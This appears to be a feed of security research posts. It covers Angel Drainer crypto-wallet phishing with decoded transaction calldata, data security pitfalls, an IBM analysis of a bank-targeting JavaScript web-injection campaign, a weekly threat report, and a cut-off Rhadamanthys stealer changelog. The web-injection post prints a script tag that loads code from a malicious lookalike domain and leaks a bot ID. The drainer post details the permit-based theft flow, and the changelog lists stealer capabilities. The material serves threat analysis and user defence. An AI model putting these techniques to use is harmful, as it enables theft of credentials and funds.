The Rising Threat of Phishing Attacks with Crypto Drainers

By Oded Vanunu, Dikla Barda, Roman Zaikin

Unmasking Deceptive Tactics: A recent investigation by Check Point Research exposes a troubling trend in the cryptocurrency landscape. The cryptocurrency community has been witnessing an alarming increase in sophisticated phishing attacks.

These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique.

Check Point’s Threat Intel blockchain system identified and alerted us on such phishing attacks:

During our investigation into some of the attacks, we came across a reoccurring address: 0x412f10aad96fd78da6736387e2c84931ac20313f and 0x0000d38a234679F88dd6343d34E26DCB50C30000 which are familiar by the names Angel Drainer address.

“Angel Drainer” refers to a notorious phishing group involved in cyberattacks, particularly in the cryptocurrency space. This group has been linked to various malicious activities, including the draining of cryptocurrency wallets through sophisticated phishing schemes.

Despite the shutdown of similar groups like Inferno Drainer, which assisted in stealing over $80 million in cryptocurrency, Angel Drainer continues its operations. These wallet drainers charge a percentage of the stolen amount from hackers in exchange for providing wallet-draining scripts and other services. The persistence of such scam-as-a-service entities poses significant challenges to the cryptocurrency market and emphasizes the importance of robust security measures to protect users and their assets.

Looking into the Angel Drainer kit in the wild, we came across a forum that gave us information about Angel Drainer service:

Before we start our deep dive into some of the techniques Angel drainer uses, let us explain what a crypto drainer is:

A crypto draining kit is crafted to facilitate cyber theft by draining funds from digital wallets. It operates primarily through phishing scams, luring victims to enter their wallet details on counterfeit websites.

Crypto drainers, also known as cryptocurrency stealers, are malicious programs or scripts designed to illegally transfer cryptocurrency from victims’ wallets without their consent.

The way most crypto drainers work is relatively straightforward:

Launch of a Malicious Campaign: Attackers create fake airdrop or phishing campaigns, often promoted on social media or via email, offering free tokens to lure users.

Deceptive Website: Users attempting to claim these tokens are directed to a fraudulent website that mimics a genuine token distribution platform.

Wallet Connection: Users are asked to connect their wallets to the website, preparing for the subsequent attack phase without immediate compromise.

Smart Contract Interaction: The user is induced to interact with a malicious smart contract under the guise of claiming the airdrop, which stealthily increases the attacker’s allowance through functions like approve or permit.

Asset Transfer and Obfuscation: Unknowingly, the user grants the attacker access to their funds, enabling token theft without further user interaction. Attackers then use methods like mixers or multiple transfers to obscure their tracks and liquidate the stolen assets.

Permit in the context of ERC-20 tokens is a feature that allows token holders to approve a spender (such as a smart contract) to transfer tokens on their behalf without conducting an on-chain transaction for each approval.

This can be done by signing a message off-chain with the token holder’s private key, which includes details like the spender’s address, the amount they are allowed to spend, and a validity period. This signed message can then be used by the spender or a contract to set the allowance on-chain. The permit function enhances user experience by reducing transaction costs and streamlines interactions in decentralized applications (dApps), especially in the DeFi sector. If the user is tricked and signs such a function, the attacker will be able to transfer his funds.

What is even more interesting in such behavior is that no trace will be logged to the blockchain because the sign is happening off-chain via communication between the wallet and the phishing DeFi website.

Deep Dive

Let’s start by examining one of the transactions used by Angel Drainer technique: 0xb60c32fb28aa6160df6f472f494f162b997aa49fb06776dce250aff80602a8a3

If we analyze the transaction logs, we can see a few main events:

Ownership transfer event

Approval event

Transfer and Transfer events

To fully understand the sequence of events in the attack, an in-depth analysis of the smart contract at address 0x47cbbfee58e6a134d00ea3a8f1ddfff60a8d94d6 is necessary, this includes examining the specific function that was triggered, which is identified by the code 0x095838d2.

By exploring the data involved in this function call, we can uncover the particular actions executed by the smart contract and how these actions played a role in the attack, so let’s look at the data that was sent to the scammer contract:

0x095838d2000000000000000000000000c55b8ebf5ec4c76fb9182e86cb2a29eb363d919c000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000003000000000000000000000000ae7ab96520de3a18e5e111b5eaab095312d7fe84000000000000000000000000ae7ab96520de3a18e5e111b5eaab095312d7fe84000000000000000000000000ae7ab96520de3a18e5e111b5eaab095312d7fe84000000000000000000000000000000000000000000000000000000000000000300000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000180000000000000000000000000000000000000000000000000000000000000022000000000000000000000000000000000000000000000000000000000000000e4d505accf0000000000000000000000009a875f6ce282e8009aa9432784f8124067032c99000000000000000000000000c55b8ebf5ec4c76fb9182e86cb2a29eb363d919c00000000000000b88e282822ab5ed106947c1c60af583c1741a38e858de0000000000000000000000000000000000000000000000000000000000193870b574e000000000000000000000000000000000000000000000000000000000000001ca361b0da886b37585d06e3ef06b22a1c328c949d7f6e412df12c19e2821e57935fb0f4948df32c52b17cabd6c7753129cad97e95edb1113ba181c83df0849f4200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000009a875f6ce282e8009aa9432784f8124067032c99000000000000000000000000fbcbc1dc95eec0ecec3051fb55a8921cf5157f2800000000000000000000000000000000000000000000000083ffc624afcd500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000009a875f6ce282e8009aa9432784f8124067032c99000000000000000000000000412f10aad96fd78da6736387e2c84931ac20313f000000000000000000000000000000000000000000000000174b4115886f87cc00000000000000000000000000000000000000000000000000000000

The function selector 0x095838d2, extracted from the initial 4 bytes of the input, clarifies that the function with this selector was executed. The parameters passed to this function were:

Param1: An Ethereum address: 0xc55b8ebf5ec4c76fb9182e86cb2a29eb363d919c.

Param2: An array consisting of three identical Ethereum addresses: 0xae7ab96520de3a18e5e111b5eaab095312d7fe84 for each entry.

Param3: an array of 3 long elements.

These parameters provide insights into the nature of the transaction initiated by the contract, helping to understand the methodology of the operation within the scam.

For clarity and ease of reference, let’s label the aforementioned address with an alias:

0xc55b8ebf5ec4c76fb9182e86cb2a29eb363d919c – scammer_contract_1

0xae7ab96520de3a18e5e111b5eaab095312d7fe84 – stEth_token_contract

0x9a875f6ce282e8009aa9432784f8124067032c99 – victim_address

0x412f10aad96fd78da6736387e2c84931ac20313f – angel_drainer_wallet

0x47cbbfee58e6a134d00ea3a8f1ddfff60a8d94d6 – scammer_contract_2

Function 0x095838d2(): executed by scammer_contract_2

The initial action executed involved the creation of a contract at the scammer_contract_1 address, which is referred to as Param1 in the process data.

In the screenshot below we can see:

The scammer’s strategy involves verifying the existence of a contract at the address provided in scammer_contract_1 by checking the code size at that address. If the code size is greater than zero, indicating a contract exists, the scammer proceeds to execute the multicall function on this existing contract. Subsequently, if the multicall operation is successful, a new contract is deployed.

On the other hand, if there is no existing contract at the scammer_contract_1 address (i.e., the code size is zero), the scammer’s approach changes. In this case, the first step is to deploy new contract addresses with no transaction history, enabling them to bypass wallet security alerts, followed by invoking the multicall function on this newly created contract.

In the situation we’re analyzing, the sequence of actions chosen involves first deploying a new contract, followed by the execution of the multicall function to the deployed address (scammer_contract_1) as can be seen in the screenshot below. This method highlights a particular approach to orchestrating contract interactions. Let’s proceed to examine the details of this procedure.

Function multicall(): executed by scammer_contract_1

The multicall function in question, executed on the contract at address scammer_contract_1, involves the use of two additional arrays (referred to as param2 and param3) as parameters. In this specific operation, the function is directed to carry out three distinct actions as can be seen in the screenshot below. All these actions target the same contract address, stEth_token_contract, which is associated with the stETH token and corresponds to param2 in the function call data.

In the execution of the multicall function on the contract at scammer_contract_1, the signatures for all operations were included as parameters. Analyzing the data reveals the specific function signatures that were utilized in these operations. These signatures effectively outline the set of actions to be performed by the multicall function:

0xd505accf – Permit function

0x23b872dd – TransferFrom X2

Function Call(): executed by stEth_token_contract

Let’s examine the initial transaction involving the Permit function. When we analyze the data that was submitted for this function call, we can identify the Permit signature in the first four bytes.

Breaking down the Permit function data, we note that it typically requires the following parameters:

Owner, spender, value, deadline, and V, R, S.

Understanding these parameters and their implications is key to recognizing how such functions can be exploited in scams, and why vigilance is necessary when dealing with token permissions, so let’s look at the data:

Owner: This is the address of the token owner, essentially the victim in this scenario. In our case, it’s:0x9a875f6ce282e8009aa9432784f8124067032c99.

Spender: The address that is authorized to spend the tokens, controlled by the scammer.

In our case, it’s 0xc55b8ebf5ec4c76fb9182e86cb2a29eb363d919c.

Value: The specified amount of tokens the spender is permitted to use. In our case is: 83476733574422399944877753435006670731032001850387113967616000000000000000000, This extraordinarily large number typically indicates permission for an unlimited amount of tokens.

Deadline: The expiration time for the permit’s validity. In our case is: 1733137487694.

V, R, S: These are the components of the cryptographic signature, essential for verifying the authenticity of the transaction.

From this data, it’s evident that if the victim signs this permit, the scammer’s contract address would gain access to a potentially unlimited amount of the victim’s stETH tokens. This highlights the critical importance of understanding and verifying transaction details, especially in the context of token permissions and transfers.

Upon executing the Permit call with the victim’s signature, the scammer would then use the transferFrom function from scammer_contract_1 to move tokens on behalf of the victim.

Following this, another transfer is arranged from the scammer’s address to the address Angel_drainer_wallet, often referred to as the Angel drainer address, as part of a presumed agreement to distribute the stolen funds.

Upon completion of these transfers, the victim would be deprived of all their stETH tokens. Subsequently, the scammer would change the ownership of the contract address they used for the attack, scammer_contract_1, transferring it from one contract address to another scammer controlled address. This final step would effectively complete the scam operation, leaving the victim without their tokens and the scammer in control of the new contract.

Looking at the “Angel Drainer” wallet address, it seems that he earns significant amounts of money not just through direct activities but also from others using its drain kit.

Safeguarding Your Assets

The risks involved in these scams are manifold. First and foremost is the risk of unsolicited emails and messages, which are a common starting point for these phishing attacks. Users must be extremely cautious with such communications, especially when they lead to external links. Another significant risk is the use of URLs that closely mimic legitimate ones, designed to deceive even the most vigilant eye. The most critical risk, however, is embedded in the approval of transactions that seem innocuous but are, in fact, malicious.

The key to safeguarding against these phishing attacks lies in a combination of vigilance and the use of technological safeguards. Users are advised to:

Be skeptical of airdrop claims, especially those requiring wallet interaction.

Understand the implications of approving transactions or signing messages in their wallets.

Verify the legitimacy of smart contracts before interacting with them.

Limit the use of high allowances or regularly review and revoke them using blockchain explorers or wallet interfaces.

Employ hardware wallets for enhanced security, especially for substantial holdings.

Conclusion

The threat posed by these phishing attacks cannot be overstated. In the dynamic and ever-evolving world of cryptocurrency, staying informed and cautious is not just advisable; it’s essential. The community needs to collectively work towards building a more secure and aware environment, where each member is equipped with the knowledge and tools to protect their digital assets. Remember, in the realm of cybersecurity, it’s always better to err on the side of caution. Let’s spread the word and help keep our community safe.

The Threat Intel Blockchain system, developed by Check Point, continues to accumulate valuable information on emerging threats, and this intelligence will be shared in the future. In this collaborative effort, we aim to empower investors with the knowledge needed to navigate the crypto space securely and protect themselves from potential pitfalls. For more information contact us at: blockchain@checkpoint.com

The post The Rising Threat of Phishing Attacks with Crypto Drainers appeared first on Check Point Research.

Check Point Research – ​Read More

5 common data security pitfalls — and how to avoid them

Data protection has come a long way. In previous years, it was considered a “nice to have” and a line item on the budget further down the page. Today, it’s top of mind for almost every CIO or CISO across all industries.

Yet many organizations are caught in the crosshairs of cybersecurity challenges, often due to common oversights and misconceptions about data security. It’s not surprising due to the rising complexity of threats along with the TTP (tactics, techniques and procedures) of bad actors.

From the pitfalls of decentralized data security strategies to the challenges of neglecting known vulnerabilities and managing compliance, this article will explore each obstacle, provide actionable solutions and shine the light on a real-world example that brings it all together.

Pitfall 1: Failing to move beyond compliance

While regulations like GDPR and SOX set standards for data security, they are merely starting points and should be considered table stakes for protecting data. Compliance should not be mistaken for complete data security, as robust security involves going beyond compliance checks.

The fact is that many large data breaches have occurred in organizations that were fully compliant on paper.

Moving beyond compliance requires actively (and proactively) identifying and mitigating risks rather than just ticking boxes during audits.

Solution: Recognize compliance as a starting point

Organizations must go beyond compliance by adopting a strategic, proactive approach to protect critical data. The strategy should include discovering and classifying sensitive data, using analytics for risk assessment, enforcing data protection through encryption and access controls, monitoring for unusual activity, responding to threats quickly and streamlining compliance reporting. Understanding the broader implications of data breaches (such as legal liabilities and potential losses) is essential in developing robust data security measures.

Pitfall 2: Not recognizing the need for centralized data security

As businesses grow, data gets stored across various platforms, much of it unstructured. Data sprawl is real, underscoring the importance of centralized security oversight.

While their data sources expand further into the cloud, leaders of companies with growing IT infrastructures can become overwhelmed by this expansive attack surface. Without enough visibility and control of their sensitive data, a unified approach is challenging — and opens up gaps in security protocols and new vulnerabilities.

Solution: Know where your sensitive data resides

Effective data security involves knowing where and how sensitive data is stored and accessed, and integrating that knowledge into the broader cybersecurity program to ensure smooth communication between different technologies. Using a data security solution that operates across various environments and platforms is crucial for effective data protection and cybersecurity integration.

Pitfall 3: Unclear responsibility for ownership of data

Data is one of the most valuable assets for any organization. And yet, the question, “Who owns the data?” often leads to ambiguity within organizations.

Clear delineation of data ownership and responsibility is crucial for effective data governance. Each team or employee must understand their role in protecting data to create a culture of security. Because if nobody knows who is responsible for what data, how can you protect sensitive data?

Solution: Hiring a CDO or DPO

Hiring a Chief Data Officer (CDO) or Data Protection Officer (DPO) is a great start for effective data management and security, especially for GDPR compliance. These roles require technical knowledge, business acumen, risk assessment skills and an ability to direct strategic data security implementations. They should also manage compliance, monitor program effectiveness, negotiate with cloud providers and lead data breach response planning. Their role is key in promoting organization-wide collaboration on data security.

Pitfall 4: Failure to address known vulnerabilities

Unpatched vulnerabilities are one of the easiest targets for cyber criminals. This means that organizations face significant risks when they can’t address public vulnerabilities quickly. Despite the availability of patches, many enterprises delay deployment for various reasons, which leaves sensitive data vulnerable.

The challenge in patch management stems from the difficulty in coordinating efforts across IT, security and operational teams, alongside the need to test patches to avoid new issues. In cloud environments, the uncertainty about patching responsibilities and lack of control over third-party service providers only complicates the issue.

Solution: Implement a vulnerability management program

A thorough vulnerability management program is paramount to cybersecurity and involves regular scans and assessments of all data assets (including cloud-based). Making vulnerability remediation a priority and basing it on potential exploits and business impact is essential. Protective measures should also include data obfuscation techniques like encryption and tokenization, as well as robust key management.

Pitfall 5: Insufficient data activity monitoring

In the era of big data, monitoring data activity is inarguably difficult. What was once considered a purely IT decision has transcended into the boardroom and up and down the corporate hierarchy.

For effective data security, leaders must be vigilant about who accesses data, how they access it and when. This includes ensuring appropriate access levels and assessing associated risks — especially since privileged users often pose significant insider threats.

A key element in data protection is real-time monitoring to detect suspicious or unauthorized activities by privileged accounts. The challenge here intensifies with the need to monitor, capture, filter and process an overwhelming volume of data from diverse sources like databases, file systems and cloud environments.

Solution: Develop a comprehensive data security and compliance strategy

Starting a data security initiative requires the alignment of monitoring efforts with specific risks and business goals, and adopting a phased approach for implementing best practices. Priority should be given to monitoring the most sensitive data sources with clear policies and investing in automated monitoring solutions with advanced analytics for detecting risks and unusual activity — particularly among privileged users.

Equifax data breach: Takeaways from a real-world example

One of the most notable examples of a data breach that reflects the failure to address known vulnerabilities is the Equifax data breach of 2017, which exposed the personal information of approximately 147 million people. The breach happened due to a known vulnerability in the Apache Struts web framework, which Equifax had failed to patch promptly.

To address the far-reaching consequences of the breach, Equifax undertook monumental changes, some of which are outlined above.

According to their CIO, the company:

Invested heavily in cybersecurity (over $200 million in the year following the breach)
Boosted resources
Gained buy-in from the entire executive leadership team
Hired a new CTO with proven leadership during tenure at IBM
Implemented built-in incentives for security awareness throughout the organization tied to the annual bonus structure and even bonus deductions if specific security goals aren’t reached.

The Equifax breach serves as a stark reminder of the importance of moving beyond compliance to a more comprehensive, proactive data security approach and highlights the need for timely response to known vulnerabilities, ongoing investment in security technologies and the importance of skilled cybersecurity personnel.

For a more in-depth look at the top five data security pitfalls and the solutions to address them, check out IBM’s extensive eBook.

The post 5 common data security pitfalls — and how to avoid them appeared first on Security Intelligence.

Security Intelligence – ​Read More

Web injections are back on the rise: 40+ banks affected by new malware campaign

Web injections, a favored technique employed by various banking trojans, have been a persistent threat in the realm of cyberattacks. These malicious injections enable cyber criminals to manipulate data exchanges between users and web browsers, potentially compromising sensitive information.

In March 2023, security researchers at IBM Security Trusteer uncovered a new malware campaign using JavaScript web injections. This new campaign is widespread and particularly evasive, with historical indicators of compromise (IOCs) suggesting a possible connection to DanaBot — although we cannot definitively confirm its identity.

Since the beginning of 2023, we have seen over 50,000 infected user sessions where these injections were used by attackers, indicating the scale of threat activity, across more than 40 banks that were affected by this malware campaign across North America, South America,  Europe and Japan.

In this blog post, we will delve into an analysis of the web injection utilized in the recent campaign, its evasive techniques, code flow, targets and the methods employed to achieve them.

A dangerous new campaign

Our analysis indicates that in this new campaign, threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users’ credentials in order to then access and likely monetize their banking information.

Our data shows that threat actors purchased malicious domains in December 2022 and began executing their campaigns shortly after. Since early 2023, we’ve seen multiple sessions communicating with those domains, which remain active as of this blog’s publication.

Upon examining the injection, we discovered that the JS script is targeting a specific page structure common across multiple banks. When the requested resource contains a certain keyword and a login button with a specific ID is present, new malicious content is injected.

Credential theft is executed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it.

This web injection doesn’t target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks.

Code delivery

In the past, we observed malware that directly injected the code into the compromised web page. However, in this campaign, the malicious script is an external resource hosted on the attacker’s server. It is retrieved by injecting a script tag into the head element of the page’s HTML document, with the src attribute set to the malicious domain.

HTML snippet:

<!DOCTYPE html>

<html>

<head>

    <meta charset=”UTF-8″>

    <title>Bank page</title>

    <meta name=”description” content=”This is a mock HTML document generated for demonstration purposes.”>

    <meta name=”author” content=”Your Name”>

    <link rel=”stylesheet” href=”styles.css”>

    <script type=text/javascript src=https://jscdnpack.com/npcode_sf?SF2LO=mol%3Eb2%27s%3E1-2594363%3A8%3A9018&BI1=DESKTOP-A87DBCC2::6567&RE=wcmfd></script>

</head>

<body>

    <h1>Welcome to My Mock HTML Page</h1>
    <p>This is a sample HTML document created for testing and demonstration.</p>
</body>
</html>

During our investigation, we observed that the malware initiates data exfiltration upon the initial retrieval of the script. It appends information, such as the bot ID and different configuration flags, as query parameters. The computer’s name is usually used as the bot ID, which is information that isn’t available through the browser. It indicates that the infection has already occurred at the operating system level by other malware components, before injecting content into the browser session.

Figure 1: The initial obfuscated GET request fetching the script

Evasion techniques

The retrieved script is intentionally obfuscated and returned as a single line of code, which includes both the encoded script string and a small decoding script.

To conceal its malicious content, a large string is added at the beginning and end of the decoder code. The encoded string is then passed to a function builder within an anonymous function and promptly executed, which also initiates the execution of the malicious script.

Figure 2: Encoded string passed to de-obfuscation function, followed by removal of artifacts used for decoding the script. Two long strings were added to the beginning and end of the string to make it harder to find the code manually.

At first glance, the network traffic appears normal, and the domain resembles a legitimate content delivery network (CDN) for a JavaScript library. The malicious domains resemble two legitimate JavaScript CDNs:

Legitimate

Malicious

jscdnpack[.]com

cdnjs[.]com

unpack[.]com

unpkg[.]com

Scroll to view full table

In addition, the injection looks for a popular security vendor’s JavaScript agent by searching for the keyword “adrum” in the current page URL. If the word exists, the injection doesn’t run.

Figure 3: Searching for a security product’s keyword and doing nothing if it’s found

The injection also performs function patching, changing built-in functions that are used to gather information about the current page document object model (DOM) and JavaScript environment. The patch removes any remnant evidence of the malware from the session.

All of these actions are performed to help conceal the presence of the malware.

Dynamic web injection

The script’s behavior is highly dynamic, continuously querying both the command and control (C2) server and the current page structure and adjusting its flow based on the information obtained.

The structure is similar to a client-server architecture, where the script maintains a continuous flow of updates to the server while requesting further instructions.

To keep a record of its actions, the script sends a request to the server, logging pertinent information, such as the originating function, success or failure status and updates on various flags indicating the current state.

Figure 4: Every a.V function call sends an update to the server about what function it was sent from and the current state of different flags

Figure 5: An example of multiple traffic logs, sent within a few seconds of the script running

The script relies on receiving a specific response from the server, which determines the type of injection it should execute, if any. This type of communication greatly enhances the resilience of the web injection.

For instance, it enables the injection to patiently wait for a particular element to load, provide the server with updates regarding the presence of the injected OTP field, retry specific steps (such as injecting an SMS submission overlay) or redirect to the login page before displaying an alert indicating that the bank is temporarily unavailable.

The server keeps identifying the device by the bot ID, so even if the client tries to refresh or load the page again, the injection can continue from its previously executed step.

If the server does not respond, the injection process will not proceed. Hence, for this injection to be effective, the server must remain online.

Script flow

The script is executed within an anonymous function, creating an object that encompasses various fields and helper functions for its usage. Within the object, the injection holds the initial configuration with fields such as bot ID, phone number and password. These fields are initially empty but are populated with relevant values as the run progresses.

Additionally, the object includes details such as the C2 server’s domain and requests path, default values for query parameters and default settings for various flags such as “send SMS” and “send token.” These default values can be modified later based on the server’s response, allowing for dynamic adjustments during runtime.

Following the initial configuration, the script sends a request to the server providing initial details, and assigns a callback to handle the response, allowing the execution to proceed.

Subsequently, the script proceeds to remove itself from the DOM tree, enhancing its ability to conceal its actions. From that stage onward, all subsequent script actions are asynchronous, saved inside event handlers and dependent on the responses received from the server.

The steps the script should perform are mostly based on an “mlink” flag received from the server on the initial request. The next step of the injection is to check for the specific login button of the targeted bank. The results of the element query are sent, and the “mlink” state changes accordingly.

Following that, a new function runs asynchronously on an interval, looking for the login button and assigning a malicious event listener if found. The listener waits for a click event, collects the login credentials and handles it based on the current configuration.

For example, if the “collect token” flag is on, but the script can’t find the two-factor authentication (2FA) token input field, it just stops the current run and does nothing. If the token is found or wasn’t looked for in the first place, the script sends all the gathered information to the server.

After that, it can inject a “loading” bar to the page (opengif function), cancel the original login action or allow the client to continue with the actions by removing the handler and “clicking” it again on behalf of the user (by dispatching another “click” event).

Figure 6: The event listener prevents the default action of the login button or deletes itself and dispatches another click event based on the outcome of function G

Figure 7: This section of function G reads credentials and tries to read the injected token field value, depending on the current state of the page and flags

Potential operational states

Returning to the “synchronous” part of the callback, let’s examine some potential operational states and the corresponding actions taken.

When the “mlink” value is 2, the script injects a div that prompts the user to choose a phone number for 2FA. Once the user selects a phone number, a login attempt can be executed using the stolen credentials, and a valid token is sent to the victim from the bank.

Figure 8: Prompting a phone number for two-factor authentication

The following state is when “mlink” is equal to three, where the input field for the OTP token is injected. In this manner, DanaBot deceives the victim into providing the token, effectively bypassing the 2FA protection mechanism.

Figure 9: Prompting for the received token

When the “mlink” value is four, the script introduces an error message on the login page, indicating that online banking services will be unavailable for a duration of 12 hours. This tactic aims to discourage the victim from attempting to access their account, providing the threat actor with an opportunity to perform uninterrupted actions.

Figure 10: An error message that banking services are unavailable for 12 hours, giving the threat actor ample time to work

When the “mlink” value is 5, the script injects a page loading overlay that mimics the appearance of the original website’s loading animation. A timeout is set before transitioning to a different state, effectively “completing” the page load process.

Figure 11: An injected loading screen, an exact duplicate of the original loading screen

When the value of “mlink” is six, a “clean up” flow is initiated, removing any injected content from the page. This value serves as the default assignment for the flag in case no specific instruction is received from the server.

Mlink value

Operation

2

2FA choose phone number prompt

3

2FA insert token prompt

4

Online banking unavailable error

5

Page loading overlay

6

Cleanup

Scroll to view full table

In total, there are nine distinct potential values for the “mlink” variable, each corresponding to different states and behaviors. Additionally, multiple flags activate various actions and result in different data being sent back to the server. Combining these “mlink” values and flags allows for a diverse range of actions and data exchanges between the script and the server.

Urging vigilance

IBM has observed widespread activity from this malware campaign affecting banking applications of numerous financial institutions across North America, South America, Europe and Japan. This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state. The malware represents a significant danger to the security of financial institutions and their customers.

Users should practice vigilance when using banking apps. This includes contacting their bank to report potentially suspicious activity on their accounts, not downloading software from unknown sources and following best practices for password hygiene and email security hygiene.

Individuals and organizations must also remain vigilant, implement robust security measures and stay informed about emerging malware to effectively counteract these threats.

IBM Security Trusteer helps you to detect fraud, authenticate users and establish identity trust across the omnichannel customer journey. More than 500 leading organizations rely on Trusteer to help secure their customers’ digital journeys and support business growth.

The post Web injections are back on the rise: 40+ banks affected by new malware campaign appeared first on Security Intelligence.

Security Intelligence – ​Read More

18th December – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 18th December, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

Ukraine’s largest mobile operator, Kyivstar, was hit by “largest cyber-attack on telecom infrastructure in the world”, rendering millions without mobile and internet services for at least 48 hours. Reportedly, the attack also affected air raid sirens, ATMs, and point-of-sale terminals. Russia-affiliated group Solntsepek, who was previously linked to Russian military group Sandworm, claimed responsibility for the attack. Another Russia-aligned group, Killnet, claimed responsibility, however its involvement hasn’t been proved. Kyivstar has 24.3 million mobile subscribers and over 1.1 million home internet subscribers.
MongoDB disclosed a cybersecurity breach, revealing that their corporate systems were compromised resulting in the exposure of customer data. The threat actors are believed to have had persistent unauthorized access to the data for some time before the attack was detected on December 13th.
Ontario Public Library revealed it fell victim to a ransomware attack, after it suffered a major systems outage caused by the cyber-attack. The library’s digital services were disrupted, including WiFi, printers, the library website, and any other online products.
A supposed ransomware attack caused a Swiss district court’s IT system and telephone lines to be taken down. The attack represents a recent increase in ransomware attacks against Swiss organizations.
The Central Bank of Lesotho is suffering outages due to a cyber-attack. The bank confirmed in a statement that the attack did not cause any financial losses, although it was forced to suspend some of its system to stop the infiltration. This made any inter-bank transfers in the country impossible, and could affect Lesotho’s currency exchange rates with South Africa, its surrounding neighbor.
The Hunters International ransomware gang attacked the Fred Hutchinson Cancer Center, claiming to have compromised 533GB of the organization’s data. The group is also reportedly attempting to extort individual patients treated at the center, threatening to leak Social Security Numbers, lab results and medical history should the client not pay $50 to have their personal information removed.
American radiology and oncology services provider Akumin was reportedly hit by two ransomware groups, BlackSuit and BianLian. According to the company’s statement and information published by the groups, BlackSuit were able to exfiltrate and encrypt the data, whilst BianLian claimed to have 5 TB of highly sensitive data, including PHI (Personal Health Information).

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Wins.BlackSuit, Ransomware_Linux_BlackSuit)

VULNERABILITIES AND PATCHES

In December’s Patch Tuesday, Microsoft have issued security updates for 36 flaws and six non-Microsoft CVEs, one of which a zero-day vulnerability. Three critical flaws were fixed: Microsoft Power Platform Connector spoofing vulnerability (CVE-2023-36019), and two ICS Remote Code Execution vulnerability (CVE-2023-35630 ,CVE-2023-35641). The zero-day vulnerability (CVE-2023-20588) is a division-by-zero error on some AMD processors, and was classified as a medium severity vulnerability.
Apple released security updates for multiple vulnerabilities in their products, including Safari, iOS and iPadOS, Sonoma, Ventura, and Monterey. Exploits can allow threat actors to take control of affected systems, and two of the vulnerabilities in iOS and iPasOS are reportedly being actively exploited.
Adobe released nine patches to address 212 CVEs in their products. 186 of the vulnerabilities are cross-site scripting (XSS) bugs, while critical vulnerabilities in Adobe After Effects, Adobe Illustrator and Substance 3D Sampler were also addressed in this patch.

THREAT INTELLIGENCE REPORTS

Check Point Research has published a report highlighting the capabilities of the new Rhadamanthys stealer version 0.5.0. Rhadamanthys is an info stealer with a diverse set of modules that is being sold on the black market. In order to make it a coveted commodity in the malware market, the author of Rhadamanthys keeps updating it and adding new extensions, turning it into a multipurpose bot with a diverse set of features.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (InfoStealer.Wins.Rhadamanthys.E/F, InfoStealer.Wins.Rhadamathys.C/D/G)

Check Point Research summarized November’s top cyber threats, including the new AsyncRAT campaign, where malicious HTML files were used to spread the malware; another observed top malware was the FakeUpdates downloader, which tricks users into running fake browser updates.

Check Point Threat Emulation provide protection against this threat (RAT.Win32.AsyncRat, Downloader.WIN32.SocGholish, Dropper.Wins.SocGholish)

Microsoft tackles Storm-1152, the primary group of sellers and creators of fraudulent Microsoft accounts that act as the gateway to various cybercrime activity: phishing, identity theft and fraud, and distributed denial of service (DDoS) attacks. The group runs a cybercrime-as-a-service ecosystem that includes websites and social media accounts, all used as distribution platforms for the group who has already sold over 750 million fraudulent accounts to other cyber criminals. Multiple groups engaged in ransomware and data theft were observed utilizing Storm-1152 accounts.

The post 18th December – Threat Intelligence Report appeared first on Check Point Research.

Check Point Research – ​Read More

Rhadamanthys v0.5.0 – a deep dive into the stealer’s components

Research by: hasherezade

Highlights

The Rhadamanthys stealer is a multi-layer malware, sold on the black market, and frequently updated. Recently the author released a new major version, 0.5.0.

In the new version, the malware expands its stealing capabilities and also introduces some general-purpose spying functions.

A new plugin system makes the malware expandable for specific distributor needs.

The custom executable formats, used for modules, are unchanged since our last publication (XS1 and XS2 formats are still in distribution).

Check Point Research (CPR) provides a comprehensive review of the agent modules, presenting their capabilities and implementation, with a focus on how the stealer components are loaded and how they work.

Introduction

Rhadamanthys is an information stealer with a diverse set of modules and an interesting multilayered design.

In our last article on Rhadamanthys [1], we focused on the custom executable formats used by this malware and their similarity to a different family, Hidden Bee, which is most likely its predecessor.

In this article we do a deep dive into the functionality and cooperation between the modules. The first part of the article describes the loading chain that is used to retrieve the package with the stealer components. In the second part, we take a closer look at those components, their structure, abilities, and implementation.

Changes in version 0.5.0

Since we published our previous reports [1][2], Rhadamanthys keeps evolving. At the beginning of October, the author announced version 0.5.0 which comes with many changes, and interesting features.

Figure 1 – Telegram status of the author, announcing version 0.5.0.

The full list of changes, as described by the author:

Figure 2 – Fragment of the changelog published on the author’s Telegram channel (full version below).

V0.5.0 Change List

01. Added observer mode
02. Diversify the construction of stubs and provide x86 x32 native Exe Shellcode Dotnet4 Dotnet2 to better adapt to various usage scenarios and crypt service needs.
03. The client execution process is completely rewritten, and the BUG in the syscall unhook code that caused the crash in the old version is fixed. The execution success rate is very high, and the runtime status is better.
04. Fixed the wallet upgrade support for several wallets where the cracking algorithm fails. Currently supported
(UniSat Wallet
Tronlink
Trust
Terra Station
TokenPocket
Phantom
Metamask
KardiaChain
Exodus Desktop
Exodus Web3
Binance
) Online real-time brute force cracking
05. Fixed Discord token acquisition, the correct encrypted token can now be decoded.
06. Break through the browser data acquisition when the browser is protected by third-party programs, and add the login data decryption algorithm of 360 Secure Browser
07. The panel search condition settings have been upgraded. You can now select conditions in batches and select categories with one click.
08. Add a quick setting search filter menu to directly menu the search conditions you need to check frequently.
09. Modify some changes required by users in the Telegram notification module and add new templates for use
10. When building a page, the traffic source tag can directly set the previously used tag, and the URL address will be updated simultaneously.
11. If permissions permit, data collection under other user accounts used on the same machine is supported.
12. The file collection module adds browser extension collection settings. For the Chrome kernel browser, you only need to provide the extension directory name and whether to collect Local Storage data at the same time. Firefox kernel browser can provide extension ID
